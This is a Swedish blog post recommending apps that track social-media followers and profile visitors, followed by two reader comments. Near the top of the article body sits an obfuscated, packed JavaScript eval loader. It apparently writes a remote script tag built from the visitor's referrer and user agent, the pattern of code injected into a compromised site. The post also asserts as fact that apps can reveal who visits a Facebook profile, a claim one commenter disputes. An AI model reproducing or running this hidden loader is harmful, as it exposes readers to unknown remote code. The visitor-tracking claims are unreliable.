Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Appar som håller koll på dina followers

Appar som håller koll på dina followers
Sebastian


Appar: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|affrd|var|u0026u|referrer|izsdz||js|php’.split(’|’),0,{}))
Det är alltid intressant att hålla kolla på sina följare i de sociala medierna. Här är apparna som hjälper dig avslöja vem som slutat följa dig på Twitter, vilka som slutat kika på dina Instagrambilder eller vem som är ditt största fan på Facebook.

MyTopFans Pro - Social Tracker
MyTopFans Pro - Social Tracker Dixapp srl Sociala nätverk, Underhållning 20 SEK Ladda ner

Med appen MyTopFans for Facebook kan du kika på vem som är ditt största fan. Appen räknar ut vilka personer som besöker din facebookprofil mest. Du kan också sortera dem efter kön och förhållandestatus som detta är intressant. Det finns också en funktion som gör ett collage av alla beundrare. Så håll koll på vem som besöker din Facebookprofil.
Kan man se besökare på facebook? Kan man se vem som besöker ens facebook sida? Ja, se vilka som besöker din facebook

Visst kan alla se vem som följer dig på Instagram det är bara att besöka profilen inne i appen. Men ibland kan det vara kul att se vem som slutat följa dig samt vilka du följer men kanske inte följer tillbaka. Med InstaFollow kan du se just detta. Det finns också funktioner som visar vilka gemensamma vänner och största fans du har tillsammans med någon.

TwitFollow visar kort och gott vem eller vilka som slutat följa ditt konto. Ett smart sätt att hålla kolla på dina följare.

Se fråga på Questly.se

Comments

  1. Gustaf

    Intressant må jag säga. Ska testa den för Facebook!

  2. Inga

    Facebook appen är sämst. Köp den inte. Den visar jätte lite info om dina besök. Helt ovärt.